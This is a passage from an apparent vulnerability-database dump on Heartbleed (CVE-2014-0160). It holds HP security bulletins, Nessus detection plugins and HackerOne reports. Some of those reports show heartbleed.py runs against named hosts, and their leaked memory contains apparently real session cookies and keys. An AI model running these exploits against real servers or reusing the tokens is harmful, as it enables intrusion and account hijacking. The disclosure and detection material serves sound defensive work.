mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnCEgCgs9NE3ajD5WkXefc30WZhR/JQ\r\ngwkAoNoHbkxpxzqSry1ZLk2OkJIc3Tnk\r\n=jhjw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30476", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30476", "title": "[security bulletin] HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260385\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260385\r\nVersion: 1\r\n\r\nHPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with WMI Mapper for HP\r\nSystems Insight Manager running OpenSSL. This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101523\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for WMI Mapper for HP\r\nSystems Insight Manager to resolve the vulnerability.\r\n\r\nWMI Mapper 7.2.3 (to be used for 7.2, 7.2.1 and 7.2.2 upgrades)\r\nWMI Mapper 7.3.2 (to be used for 7.3 and 7.3.1 upgrades)\r\n\r\nThe software updates are available here:\r\n\r\nSoftware Version\r\n Location\r\n\r\nWMI Mapper 7.2.3\r\n http://www.hp.com/swpublishing/MTX-9ef95a0fdf044f7aa5f7a09445\r\n\r\nWMI Mapper 7.3.2\r\n http://www.hp.com/swpublishing/MTX-4503970ccd6841dca639ddbcee\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW4IMACgkQ4B86/C0qfVmF8ACaAvPqjqJ+M0rI8rH+l1chmwY4\r\np/gAoIxRd6xqTFRbjlGtAFTc2jY01H1K\r\n=q4pb\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30506", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30506", "title": "[security bulletin] HPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "hackerone": [{"lastseen": "2018-11-23T14:56:22", "bulletinFamily": "bugbounty", "bounty": 200.0, "cvelist": [], "description": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430 portal.sf.mail.ru\r\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043a\u0443\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u0434\u043e 64\u041a\u0411. \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u043e \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0430\u0441\u0442\u044c \u0432\u0430\u0448\u0435\u0439 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u043a \u044d\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0438 \u044f \u0440\u0430\u0434\u0438 \u0447\u0438\u0441\u0442\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430.", "modified": "2014-12-10T19:29:15", "published": "2014-10-23T15:12:13", "id": "H1:32570", "href": "https://hackerone.com/reports/32570", "type": "hackerone", "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-04T10:02:55", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": [], "description": "Pls see attachment files for details:\r\npython ssltest.py concrete5.org 443|more\r\n\r\nimpact: critical, pls patch it ASAP\r\n\r\nReferences:\r\nhttps://www.openssl.org/news/secadv_20140407.txt\r\nhttp://heartbleed.com\r\nhttps://github.com/openssl/openssl/commit/96db9023b881d7cd9f379b0c154650d6c108e9a3\r\n~g4mm4\r\nhttps://twitter.com/xchym", "modified": "2014-04-09T00:37:33", "published": "2014-04-08T11:01:31", "id": "H1:6475", "href": "https://hackerone.com/reports/6475", "type": "hackerone", "title": "concrete5: https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "cvelist": ["CVE-2014-0160"], "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py 185.30.178.33 -p 1443\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: 185.30.178.33:1443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: 185.30.178.33:1443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.......X-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36\r\nReferer: https://adm.riotzone.net:1443/webadm/\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8,ru;q=0.6\r\nCookie: fbm_335418533141749=base_domain=.riotzone.net; weblang=de; auser=1177778; atype=my; asess=2d53c33bbbb985848534e390323c0630; ashow=100007781204577@facebook; nofoo=1; anick=LaVerdad; aserv=1; level=50; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n\r\n.....\r\nSM....)..Z..............b....o...~..^..DF..4......g..%.E.EaVHhJUTZhak8xNWdJYTRIZExkVXpuSVUxVmIwZHVrSV9ZTWw0bkpEQktHVkQyQ3Fpb190MGZFclhMYVg2bjVBMTZnVkZpMWlHMzJ3VFVPNTlvZFR2VU5QWnBjZXBRaVh5OTNHdVR5cEJlR2NCUzhENWR5WXJTcU1CNHRteTl2Q01YTUhjQ212STFkRzZid0poaCIsImlzc3VlZF9hdCI6MTQyMTYwMjM1NCwidXNlcl9pZCI6IjEwMDAwNzc4MTIwNDU3NyJ9; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmb=72033936.2.10.1421602346; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n", "modified": "2015-09-13T12:13:15", "published": "2015-01-19T13:54:12", "id": "H1:44294", "href": "https://hackerone.com/reports/44294", "type": "hackerone", "title": "Mail.ru: Heartbleed: my.com (185.30.178.33) port 1433", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "cvelist": ["CVE-2014-0160"], "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py scfbp.tng.mail.ru\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: scfbp.tng.mail.ru:443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: scfbp.tng.mail.ru:443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.........Y.[.uu.n.~J....4.F.P.<.5}b.n\r\n.................................3t.............http/1.1.spdy/3.1.h2-14uP.........\r\n.............WXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1\r\nHost: 195.211.20.229\r\nAccept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1\r\n", "modified": "2015-09-13T12:16:27", "published": "2015-02-25T07:49:11", "id": "H1:49139", "href": "https://hackerone.com/reports/49139", "type": "hackerone", "title": "Mail.ru: scfbp.tng.mail.ru: Heartbleed", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-01-12T10:12:42", "description": "Fixes CVE-2014-0160 (RHBZ #1085066)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2014-04-15T00:00:00", "title": "Fedora 20 : mingw-openssl-1.0.1e-6.fc20 (2014-4982) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mingw-openssl", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-4982.NASL", "href": "https://www.tenable.com/plugins/nessus/73509", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-4982.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73509);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"FEDORA\", value:\"2014-4982\");\n\n script_name(english:\"Fedora 20 : mingw-openssl-1.0.1e-6.fc20 (2014-4982) (Heartbleed)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes CVE-2014-0160 (RHBZ #1085066)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085066\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131346.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d2b791cc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mingw-openssl-1.0.1e-6.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-openssl\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T02:33:27", "description": "According to its banner, the version of FileZilla Server running on\nthe remote host is prior to 0.9.44. It is, therefore, affected by\nan information disclosure vulnerability.\n\nAn information disclosure flaw exists with the OpenSSL included with\nFileZilla Server. A remote attacker could read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 25, "published": "2014-04-21T00:00:00", "title": "FileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:filezilla:filezilla_server"], "id": "FILEZILLA_SERVER_0944.NASL", "href": "https://www.tenable.com/plugins/nessus/73640", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73640);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"FileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the banner version of FileZilla Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of FileZilla Server running on\nthe remote host is prior to 0.9.44. It is, therefore, affected by\nan information disclosure vulnerability.\n\nAn information disclosure flaw exists with the OpenSSL included with\nFileZilla Server. A remote attacker could read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://filezilla-project.org/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FileZilla Server version 0.9.44 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:filezilla:filezilla_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_keys(\"ftp/filezilla\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nexit(0, \"Temporarily deprecated.\");\n\nport = get_ftp_port(default: 21);\n\nbanner = get_ftp_banner(port:port);\nif (!banner) audit(AUDIT_WEB_BANNER_NOT, port);\nif (\"FileZilla Server\" >!< banner) audit(AUDIT_WRONG_WEB_SERVER, port, \"FileZilla Server\");\n\nbanner = strstr(banner, \"FileZilla Server\");\nbanner = banner - strstr(banner, '\\r\\n');\n\nversion = eregmatch(pattern:\"FileZilla Server version (\\d\\.\\d\\.(\\d\\d[a-e]|\\d\\d|\\d[a-e]|\\d))\",string:banner);\n\nif(isnull(version)) audit(AUDIT_UNKNOWN_WEB_SERVER_VER, \"FileZilla Server\", port);\n\nif (\n version[1] =~ \"^0\\.[0-8]($|[^0-9])\" ||\n version[1] =~ \"^0\\.9\\.([0-9]|[1-3][0-9]|4[0-3])($|[^0-9])\"\n)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Application : FileZilla Server' +\n '\\n Version : ' + version[1] +\n '\\n Fixed : 0.9.44' +\n '\\n Banner : ' + banner +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"FileZilla Server\", version[1]);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:15:36", "description": "The version of HP LoadRunner installed on the remote host is 11.52.x\nprior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is,\ntherefore, affected by an out-of-bounds read error, known as the\n'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.", "edition": 27, "published": "2014-08-07T00:00:00", "title": "HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:loadrunner"], "id": "HP_LOADRUNNER_12_00_1.NASL", "href": "https://www.tenable.com/plugins/nessus/77054", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77054);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"HPSBMU03040\");\n script_xref(name:\"HP\", value:\"SSRT101565\");\n\n script_name(english:\"HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of HP LoadRunner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP LoadRunner installed on the remote host is 11.52.x\nprior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is,\ntherefore, affected by an out-of-bounds read error, known as the\n'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04286049\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3b43466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/532104/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to HP LoadRunner 11.52 Patch 2 / 12.00 Patch 1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:loadrunner\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_loadrunner_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/HP LoadRunner\");\n script_require_ports(139, 445);\n\n 